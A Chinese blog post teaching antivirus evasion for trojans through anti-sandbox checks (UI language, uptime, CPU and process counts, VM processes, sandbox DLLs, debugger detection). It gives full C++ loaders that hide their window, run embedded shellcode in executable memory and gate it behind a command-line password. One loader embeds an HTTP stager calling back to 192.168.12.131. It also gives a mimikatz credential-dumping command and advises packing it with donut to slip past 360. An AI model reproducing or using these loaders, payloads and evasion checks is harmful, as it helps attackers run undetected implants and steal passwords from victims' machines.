个人博客 wutongsec.cn
1.什么是沙箱
随着互联网的发展,网络安全问题也日益严峻。恶意软件、网络攻击等威胁不断涌现,给个人用户和企业带来了巨大的损失。为了解决这一问题,云沙箱技术应运而生。云沙箱是一种基于虚拟化技术的安全防护机制,主要用于对可疑文件、恶意代码进行分析和检测。其原理是通过在云端建立隔离的虚拟环境,将待分析的文件或代码运行在这个环境中,以模拟真实的操作系统和网络环境。通过监控和分析其行为,发现并识别其中的恶意行为。
1.2云沙箱的工作流程
1. 提交样本:用户将怀疑存在恶意的文件或代码提交给云沙箱系统。这些样本可能是通过电子邮件、下载或其他途径获得的。
2. 环境隔离:云沙箱系统将待分析的样本运行在隔离的虚拟环境中。这个虚拟环境与真实的操作系统和网络环境相似,但是与真实系统完全隔离,以防止样本对真实系统的伤害。
3. 动态行为分析:在虚拟环境中,云沙箱系统监控样本的行为和操作。它记录样本的文件操作、注册表修改、网络连接等行为,并生成行为日志。
4. 恶意行为检测:云沙箱系统使用各种检测技术来分析样本的行为日志,以确定其中是否存在恶意行为。这些技术包括基于特征的检测、行为模式分析、机器学习等。
5. 报告生成:云沙箱系统根据分析结果生成报告。报告中包含样本的基本信息、行为日志、恶意行为检测结果等。这些报告可以帮助用户了解样本的威胁程度和行为特征。
2.为什么要反沙箱
反沙箱是木马免杀中极为重要的一个步骤, 大部分杀软本地都会有一个内置的沙箱/或者云上沙箱,当我们
想要运行一个exe时,都会在沙箱中模拟运行, 进行检测
那么如何进行反沙箱呢?
思考云沙箱和真实环境的差异, 或者是云沙箱针对你当前的环境的差异, 针对性的反沙箱
3.反沙箱的基本方法
核心就是 检测当前是否在沙箱环境内
我们可以通过 语言检测 , 开机时间、延迟执行、物理内存、CPU核心数,文件名、磁盘大小、用户名、
进程名去判断是否是在沙箱的环境中, 如果是在沙箱的环境, 那就退出
int check() {
LANGID langId = GetUserDefaultUILanguage();
if (PRIMARYLANGID(langId) == LANG_CHINESE)
{
printf("Chinese");
RunCode(); // 运行我们的代码
}
else
{
printf("Error");
exit(1);
}
return 0;
}
一般沙箱都是重新起一个机器
int checkStartTime(){
ULONG uptime = GetTickCount();
if (uptime >= 10 * 60 * 1000) { // 开机时间大于10分钟
RunCode(); // 运行我们的代码
}
else {
exit(1);
}
}
int checkVm(char* name) {
const char* list[4] = { "vmtoolsd.exe","vmwaretrat.exe","vmwareuser.exe","vmacthlp.exe" };
for (int i = 0; i < 4; i++) {
if (strcmp(name, list[i]) == 0)
return -1;
}
return 0;
}
bool CheckProcess() {
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
BOOL bResult = Process32First(hProcessSnap, &pe32);
while (bResult) {
char ss_Name[MAX_PATH] = { 0 };
WideCharToMultiByte(CP_ACP, 0, pe32.szExeFile, -1, ss_Name, sizeof(ss_Name),
NULL, NULL);
//printf("%s\n", ss_Name);
if (check(ss_Name) == -1)
return false;
bResult = Process32Next(hProcessSnap, &pe32);
}
return true;
}
#include <windows.h>
#include <iostream>
#include <intrin.h>
#include <Iphlpapi.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <Pdh.h>
#include <string>
#pragma comment(lib, "IPHLPAPI.lib")
#pragma comment(lib, "Psapi.lib")
#pragma comment(lib, "Pdh.lib")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗口
#pragma data_seg("vdata")//创建内存
#pragma data_seg()//中间
#pragma comment(linker,"/SECTION:vdata,RWE")//权限
// 是否出于调试器中
bool isDebuggerPresent() {
return IsDebuggerPresent() || CheckRemoteDebuggerPresent(GetCurrentProcess(), nullptr);
}
// 检测cpu是否支持虚拟化
bool checkCpuVirtualization() {
int cpuInfo[4];
__cpuid(cpuInfo, 1);
return (cpuInfo[2] & (1 << 31)) != 0;
}
// 检测语言是否是非中文
bool checkLan() {
LANGID langId = GetUserDefaultUILanguage();
if (PRIMARYLANGID(langId) == LANG_CHINESE)
{
return false;
}
else
{
return true;
}
}
// 检测进程数量是否小于60
bool checkProcessCount() {
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32) };
if (hSnapshot == INVALID_HANDLE_VALUE) {
return false;
}
int processCount = 0;
if (Process32First(hSnapshot, &pe32)) {
do {
processCount++;
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
return processCount < 60;
}
// 检cpu数量是否小于4
bool checkCpuCount() {
SYSTEM_INFO systemInfo;
GetSystemInfo(&systemInfo);
return systemInfo.dwNumberOfProcessors < 4;
}
bool checkStartTime() {
ULONG uptime = GetTickCount();
if (uptime >= 10 * 60 * 1000) { // 开机时间大于10分钟
return false;
}
else {
return true;
}
};
// 检测是否存在沙箱dll
bool checkSandboxDlls() {
// Check for known sandbox-related DLLs
return GetModuleHandle(L"Cuckoo") || GetModuleHandle(L"vmcheck") ||
GetModuleHandle(L"SandboxieDll") ||
GetModuleHandle(L"snxhk.dll") || GetModuleHandle(L"vmsrvc") ||
GetModuleHandle(L"cmdvrt32") ||
GetModuleHandle(L"SbieDll.dll") || GetModuleHandle(L"dbghelp.dll");
}
bool checkAdminUser() {
wchar_t userName[UNLEN + 1];
DWORD userNameSize = UNLEN + 1;
// 获取当前计算机用户名
if (GetUserName(userName, &userNameSize)) {
wprintf(L"Current User: %s\n", userName);
// 检查用户名是否为"admin"
if (wcscmp(userName, L"admin") == 0) {
return false; // 是"admin"
}
else {
return true; // 不是"admin"
}
}
else {
wprintf(L"Error getting user name. Error code: %d\n", GetLastError());
return false;
}
}
// 总的检测函数
bool checkEnvironment() {
return isDebuggerPresent() || checkCpuVirtualization() || checkStartTime() || checkLan() ||
checkProcessCount() || checkSandboxDlls() || checkCpuCount();
}
unsigned char sc[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x4e\x70\x4a\x55\x00\x81\x26\x65\x57\x49\x80\x31\x0f\xd3\xf9\x41\xc7\x88\x6a\xac\xac\x4f\x47\xf8\x18\x34\x62\x86\x10\x95\x8c\x87\xf8\xfc\x74\x52\xc2\xd0\xb6\x95\xd6\x77\xaa\x60\x31\xcf\x7f\xe6\x57\x5f\xd5\x6b\x50\xfe\x42\x9a\xee\x1e\x34\x4f\x03\x20\xcf\xa1\xea\x29\x7f\x03\xd6\xc7\x74\x0e\x59\x72\x29\xbb\xfe\x92\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x47\x57\x4a\x53\x29\x0d\x0a\x00\xd9\x0d\x64\x96\xe7\x34\xbe\xc9\xb8\x50\x4e\xdd\x6a\x01\x48\xa5\x08\x0b\xc5\x8f\x20\x9c\x9b\x4b\xb8\x3d\xa4\x35\xe7\xcb\x2a\xdb\xa6\xe1\x10\x0f\xe6\x6e\x78\x13\xc8\xc4\x76\x49\x0f\x06\xbe\xfe\xc2\xca\x7f\xe0\x01\x20\x56\xf3\xd9\x11\x0c\xd9\x78\xb0\xc8\x31\xb7\xa2\x4c\x22\xa1\x9e\x24\x95\xec\x72\x70\xf6\x1a\x38\xeb\x61\x77\x9f\xd3\x91\xa2\xfe\xa6\x50\x9b\x53\x4b\x83\x13\x08\x27\x43\xd7\xa1\x9d\x06\x2d\xa0\x4a\x35\x76\x0e\xda\xf5\x6e\x2d\xe3\xf4\x6a\x66\x72\x27\xd9\x22\x7d\xe0\x73\x89\x22\xa1\xcf\xe1\xa7\x81\xde\x2d\x58\x07\x06\xa5\xc6\x40\xca\xa7\x48\x0f\x84\x95\xcb\x09\x1b\xd7\xd5\x7f\xa3\x8f\x71\xaf\xc0\xa5\x8a\xf6\x12\x2c\x71\xe5\x51\xc6\x9c\x1f\x05\x71\xbe\xca\xe8\x4a\x82\xa8\x1e\xb3\x01\xdb\x87\x45\xb7\xdb\xa9\x90\xbf\xa3\x28\x30\x54\x2c\x74\x92\x84\x76\x10\x7f\x96\x80\x47\x79\xfe\xf7\xd2\xc7\x56\xa1\xc3\xb5\xf4\x55\xa3\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x32\x2e\x31\x33\x31\x00\x00\x01\x86\xa0";
int main() {
if (checkEnvironment()) {
// 沙箱退出
//std::cout << "Detected sandbox environment. Exiting..." << std::endl;
return 1;
}
// 运行shellcode
((void(*)()) & sc)();
}
分离免杀 本地/网络
参数启动
指的是在启动exe的时候, 通过命令行的参数启动, 参数一定要是强参数
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗
口
unsigned char sc[] = "\xfc\x48\x83\xe4\xf0\xe8";
int main(int argc, char* argv[]) {
if (strcmp(argv[1], "dabaige") != 0) {
return 1;
}
// 使用VirtualAlloc 函数申请一个 shellcode字节大小的可以执行代码的内存块
LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
// 申请失败 , 退出
if (addr == NULL) {
return 1;
}
// 把shellcode拷贝到这块内存
memcpy(addr, sc, sizeof(sc));
// 创建线程运行
HANDLE hThread = CreateThread(NULL,
NULL,
(LPTHREAD_START_ROUTINE)addr,
NULL,
NULL,
0);
// 等待线程运行
WaitForSingleObject(hThread, -1);
// 关闭线程
CloseHandle(hThread);
}
有的参数被360拉黑, 比如mimikatz抓密码
比如这个抓密码的命令
output.exe "privilege::debug" "log" "sekurlsa::logonpassWords"
你mimikatz免杀没做好, 可能是参数被拦截了
解决办法, 使用甜甜圈(donut_v1.0)把mimikatz以及需要运行的参数转成shellcode, 然后使用加载器 运行即可
加载器免杀就行
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗口
/* length: 893 bytes */
unsigned char sc[] = { 0xe8,0xf3,0x04,0x00,0x00,0x14,0x52,0x6b,0x86,0x1c,0x8c,0x4d,0x70,0xff,0xff,0xb3,0x72,0x54,0x24,0x00,0x00,0x00,0x41,0x30,0x34,0x0a,0x41,0x02,0x34,0x0a,0xe2,0xf6,0x72,0x50,0xf5,0xf1,0xf1,0xed,0x06,0xe6,0xb4,0x5a,0x67,0x61,0xb9,0xff,0x61,0x19,0x0a,0xc3,0x60,0x0b,0xa8,0xc9,0xa4,0xd0,0xce,0x6b,0x13,0x27,0xaf,0xea,0xe0,0xb4,0x38,0x12,0xd4,0xcc,0xe4,0x70,0xc0,0x8c,0xd8,0xb5,0xea,0x8b,0x29,0xb0,0x9f,0x4c,0xa8,0x73,0x35,0xef,0x9f,0x96,0x40,0x17,0x72,0x65,0x33,0xcd,0xb5,0x26,0x68,0xa0,0xbc,0xed,0x50,0x01,0xa8,0x06,0xc8,0x2d,0x4d,0x23,0x17,0x3a,0x6f,0xb9,0xe9,0x03,0xac,0xf6,0x8b,0xe3,0xab,0x68,0x31,0xf5,0x23,0x54,0x0e,0xa1,0x18,0x99,0xcd,0x82,0x9c,0xb9,0x6f,0x54,0x78,0xad,0xee,0x7d,0x0a,0x61,0xb4,0x5b,0x2a,0xd9,0xf4,0xa9,0x68,0x8b,0x5a,0x3b,0x00,0xc9,0xab,0x42,0x29,0x74,0x8f,0xdf,0x8e,0x33,0xf7,0xfd,0x89,0xb7,0x61,0x5c,0x4c,0x62,0x92,0x07,0x5a,0x7a,0x5a,0x15,0x6c,0x21,0xbb,0xc6,0xf2,0x94,0x2b,0xaf,0xfb,0xeb,0x3b,0xdf,0x69,0xad,0x1f,0xad,0x63,0x45,0x31,0xd4,0x3f,0x63,0x90,0x32,0xb7,0x5d,0xf1,0xf7,0x10,0x53,0x41,0x79,0x50,0x9d,0x61,0xff,0x64,0x6c,0xd1,0x34,0x45,0x57,0x3d,0x50,0x2f,0x2e,0xec,0x32,0xcd,0x9d,0xc5,0x27,0x72,0x23,0xa3,0x1b,0xf8,0x40,0xaa,0xb6,0x25,0x6c,0x46,0x54,0x97,0x3b,0x72,0x96,0x33,0xa0,0x04,0xb9,0x06,0x6a,0x20,0xc7,0xb0,0x4f,0x23,0xaa,0x37,0xa0,0xc7,0xcb,0x7f,0xdf,0x75,0x6e,0x0d,0xe5,0xfa,0x9b,0x97,0x06,0x41,0xd5,0xe5,0xd6,0x90,0xca,0x96,0x45,0xbc,0x6c,0xe8,0x86,0x37,0xdd,0x26,0x8e,0x72,0x2e,0x16,0xe6,0xea,0xee,0x56,0x6e,0xa4,0x29,0x7b,0x3b,0x88,0xd7,0x0a,0x48,0xe9,0xbd,0xc8,0x36,0x63,0x36,0xad,0xa3,0xd3,0x67,0x8a,0xd5,0x89,0x2d,0x91,0x8b,0x9c,0xc1,0xb3,0x83,0xb2,0x5c,0xb2,0xe3,0xf1,0xfe,0xe8,0x04,0x92,0x4d,0xe6,0x81,0xee,0x46,0xc6,0x2c,0xd6,0x5e,0x38,0xab,0x16,0x06,0x57,0xea,0xed,0x01,0x3d,0x9b,0xcd,0x2c,0xba,0x3c,0x82,0x48,0xf2,0x2e,0x49,0x44,0x74,0xe8,0xb6,0x9c,0x04,0x90,0xe8,0x6d,0xb3,0x93,0x94,0xc2,0x72,0x6b,0xc1,0x43,0x3f,0x3c,0x55,0x15,0xe0,0xd3,0xf9,0xc3,0x02,0x16,0x9c,0x81,0x18,0x13,0x04,0x8a,0x65,0xf0,0x0a,0x86,0xfd,0x63,0xb3,0xe2,0x17,0xeb,0xae,0x7e,0x9d,0x8f,0x21,0xfd,0x47,0x58,0x3b,0x38,0xbf,0x67,0x9a,0x19,0x6d,0xb7,0xc3,0x49,0x8f,0xec,0xf6,0x15,0x7b,0x0e,0x83,0x4a,0xfb,0x5d,0xbe,0x13,0xb5,0x66,0x60,0x7b,0xd7,0x8b,0xc5,0x4d,0x34,0xe7,0xe7,0x52,0x12,0x2d,0xaa,0x2b,0x6a,0x7e,0xeb,0xa1,0x19,0xca,0xb4,0x7c,0x7f,0xc4,0xad,0x89,0xd4,0x55,0xd3,0x44,0x8a,0x40,0x61,0xdf,0xc3,0xa7,0x1f,0x16,0x11,0x83,0x01,0xe6,0x53,0xcf,0xa0,0x02,0x1c,0x55,0x75,0x70,0x85,0x4e,0x43,0x8f,0x37,0xa1,0xe8,0x55,0x20,0x8d,0x9e,0x8e,0xbc,0x6e,0x5e,0x65,0x4d,0x84,0xa3,0x94,0xa1,0xf6,0x46,0x7a,0xbb,0x07,0x54,0x5f,0x9a,0x04,0x5b,0x10,0x7f,0xf7,0x9e,0x1b,0x77,0x01,0x91,0x59,0x63,0x44,0x89,0xf6,0x72,0xe2,0x3f,0x4c,0x05,0x9e,0x03,0xb6,0x23,0x81,0x94,0xbc,0x18,0x1a,0xd2,0x06,0x73,0x28,0x78,0x7d,0x35,0x99,0xb4,0xc4,0xa5,0x22,0xdb,0x89,0x77,0x50,0xe2,0xf6,0xac,0x86,0x8b,0x42,0x1b,0x31,0xeb,0x71,0x45,0x1e,0x8a,0x58,0xfc,0x26,0xc5,0x2e,0xe8,0xcc,0x9a,0x49,0x21,0x5c,0x95,0xf9,0x21,0x2d,0xd0,0xae,0x9e,0x10,0xb8,0x21,0x7e,0xb9,0x3f,0x53,0x53,0xa9,0x43,0x59,0x40,0x52,0xf7,0x2c,0xbd,0x0d,0x9b,0xec,0x7b,0x56,0xd9,0x3e,0xc6,0x7d,0xeb,0x8e,0x43,0x3c,0x1d,0xd3,0x22,0x36,0x3b,0x13,0x01,0x94,0x88,0x8e,0x7b,0x29,0xa3,0x42,0xa5,0xb7,0xc5,0x4d,0xd6,0x21,0xee,0x3d,0x28,0x4c,0x4e,0x16,0x30,0xbe,0x34,0x79,0x10,0x91,0xf4,0x8e,0x80,0x8e,0x88,0xf2,0x66,0x5f,0x15,0x3e,0xa2,0xab,0x95,0x27,0x1b,0x5b,0x41,0x9a,0x5f,0x42,0x25,0x69,0x90,0x30,0x96,0xa1,0x56,0x31,0x56,0x14,0x3c,0xa3,0x42,0xa4,0xb2,0x98,0x1e,0xbc,0x87,0x6f,0x05,0xd0,0x8c,0x49,0x2d,0xe4,0xec,0x1d,0xd8,0x2e,0x3b,0x68,0xfa,0x4e,0x12,0x5b,0xa3,0x68,0x61,0xd4,0xe7,0xcf,0xdb,0x43,0x06,0xcd,0xcd,0x4d,0xa7,0x96,0xf3,0x58,0x72,0xb9,0x85,0xd9,0x0a,0x5f,0x0b,0x0d,0x60,0x31,0x09,0x0e,0x5c,0xd5,0x0c,0x14,0x15,0xf0,0x2b,0x64,0xf9,0xf8,0x53,0x9b,0x6e,0x9a,0x33,0x35,0x13,0xec,0x2d,0x85,0xc0,0x97,0x41,0x77,0x5f,0x1a,0xe6,0xc0,0x86,0xbd,0xc2,0x5d,0xe4,0x34,0x03,0xd7,0x33,0xc9,0x12,0x00,0x95,0x9d,0xd0,0xed,0x90,0xf3,0x13,0xa3,0x26,0x17,0x09,0x1e,0x65,0x27,0x5b,0x51,0x63,0x09,0x70,0x09,0x59,0xfb,0xde,0xea,0x76,0xb7,0x7d,0xa5,0xb1,0x1c,0x58,0x7b,0xac,0xcc,0x0a,0x87,0xe0,0xf5,0x4c,0x79,0x60,0xbb,0x97,0xf4,0x65,0xf3,0x0b,0xd1,0x08,0xb2,0xd8,0xd4,0xc0,0x6b,0x25,0x4b,0x6a,0x11,0x1f,0xe6,0x23,0xf6,0xe7,0xf3,0xf1,0x79,0x32,0xb2,0x56,0x83,0x4b,0x93,0xb1,0xfb,0xaa,0x02,0x7f,0x2d,0x68,0x04,0xb3,0xc2,0x74,0xa9,0x91,0x84,0x95,0x5c,0x67,0xba,0xd6,0x4b,0x8f,0x6b,0x70,0x7d,0x45,0x40,0x63,0x20,0x7e,0x68,0xc4,0xdd,0x4c,0xbf,0x78,0x96,0x2d,0x3a,0xc2,0x6a,0x88,0x96,0x0b,0xd9,0x21,0x20,0xe1,0x65,0xe3,0x8d,0x62,0x12,0x93,0x37,0x56,0x6c,0xac,0x9d,0xc6,0x8d,0x47,0xaf,0x6b,0xeb,0x31,0x42,0xd5,0xec,0x06,0x7b,0x58,0xdb,0xa7,0x06,0x6e,0x8c,0xb1,0x03,0x13,0x2d,0x32,0x02,0x91,0x39,0x55,0xf6,0x12,0xfe,0x68,0xdd,0xcd,0x4c,0xfe,0x89,0x1b,0x3f,0x69,0x66,0x33,0x25,0x72,0x0d,0xb0,0xf6,0x36,0x32,0x92,0x89,0x2b,0xfe,0xc0,0x2a,0x48,0xe0,0x49,0x2a,0xc9,0x7e,0x72,0x46,0x85,0xa6,0xa5,0xe6,0x14,0xf7,0x4a,0x4c,0x1a,0x19,0x34,0x5d,0x1b,0xb0,0x48,0x3f,0xd5,0xad,0xa6,0x03,0xa8,0x15,0x18,0x51,0x6e,0x83,0x52,0xdc,0x43,0x44,0x7f,0xa7,0x38,0xaa,0x98,0x2c,0xf3,0x7f,0xd9,0xda,0x01,0xaf,0x1d,0x9f,0xdd,0xa6,0x9b,0xe3,0x96,0x8e,0xd0,0x94,0x66,0xa1,0x6d,0xd2,0xb7,0xd0,0x0d,0x40,0xd2,0x01,0x36,0xb1,0xa1,0x06,0xe8,0xcc,0x05,0x41,0x01,0x73,0x8e,0x91,0x99,0x68,0x10,0x03,0x7e,0x09,0x09,0xe1,0x7e,0xdb,0xb7,0xe9,0x1f,0xfd,0x59,0xdc,0x9b,0x32,0x04,0x3a,0x72,0x77,0x13,0x65,0x0f,0xc3,0xd3,0x19,0xc7,0xbb,0xe7,0x92,0xcc,0xbb,0x2c,0x36,0x89,0x6d,0x73,0x97,0x20,0xab,0xb5,0x77,0x48,0x0c,0x0c,0x68,0x44,0x5f,0x80,0x52,0x4c,0x0a,0xf7,0x38,0x6b,0x36,0x67,0xca,0xf4,0x6c,0xbf,0x38,0x21,0xd5,0x3e,0x2b,0xe1,0x06,0x23,0xec,0x06,0xb4,0x17,0x35,0x52,0x96,0x88,0x8c,0xca,0x53,0xbd,0x37,0xdd,0xdd,0xd4,0x58,0xdb,0xdc,0xbd,0x49,0xf0,0x45,0xea,0x12,0x0b,0x8a,0xa3,0xc6,0x00,0xc7,0x02,0xb7,0xf5,0x00,0x71,0x34,0x78,0x73,0x50,0x9b,0x60,0xd9,0x45,0x16,0x9a,0x58,0x63,0x35,0x8b,0xcb,0x0a,0x4b,0xc7,0xb8,0xaf,0x09,0x1f,0x44,0xe1,0x44,0x5e,0xba,0x50,0xf9,0xb9,0xb9,0x14,0xfa,0xde,0x5f,0x51,0x54,0x42,0x87,0x37,0xd4,0xe1,0x2c,0x36,0x7c,0x8e,0x7b,0xbf,0x01,0x8a,0x56,0x45,0x65,0x0c,0x4e,0xd0,0x03,0xb0,0x3e,0x8f,0x87,0xc7,0x61,0x15,0xae,0x73,0xc5,0xee,0x74,0xd6,0xb5,0xc7,0x4c,0xb9,0xff,0xd4,0x02,0x34,0xee,0x22,0x3f,0x66,0x7e,0x17,0x5b,0xa8,0xb4,0x00,0x46,0x35,0xd9,0x0d,0xe6,0xe4,0x25,0xd2,0x95,0x57,0xed,0x06,0x84,0xc5,0xa2,0xcd,0x0b,0xe6,0x5d,0x43,0x77,0x9c,0x1a,0x5b,0xd4,0x87,0x49,0xda,0xf8,0x6c,0xcd,0x8a,0x8b,0xb4,0x32,0xe8,0x87,0xe1,0x68,0xd5,0xa4,0x4c,0x8b,0x14,0x24,0x48,0x83,0xec,0x08,0x41,0x81,0x2a,0xd4,0x9b,0x23,0x3e,0x4d,0x0f,0x4f,0xd2,0x41,0xc1,0x42,0x04,0x84,0x4d,0x39,0xe4,0x41,0xf7,0x52,0x08,0x48,0x87,0xd2,0xeb,0x00,0x41,0xc1,0x42,0x0c,0x3e,0x41,0xff,0xe2 };
int main(int argc, char* argv[]) {
if (strcmp(argv[1], "123456") != 0) {
return 1;
}
// 使用VirtualAlloc 函数申请一个 shellcode字节大小的可以执行代码的内存块
LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
// 申请失败 , 退出
if (addr == NULL) {
return 1;
}
// 把shellcode拷贝到这块内存
memcpy(addr, sc, sizeof(sc));
// 创建线程运行
HANDLE hThread = CreateThread(NULL,
NULL,
(LPTHREAD_START_ROUTINE)addr,
NULL,
NULL,
0);
// 等待线程运行
WaitForSingleObject(hThread, -1);
// 关闭线程
CloseHandle(hThread);
}
扫一扫
1368
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
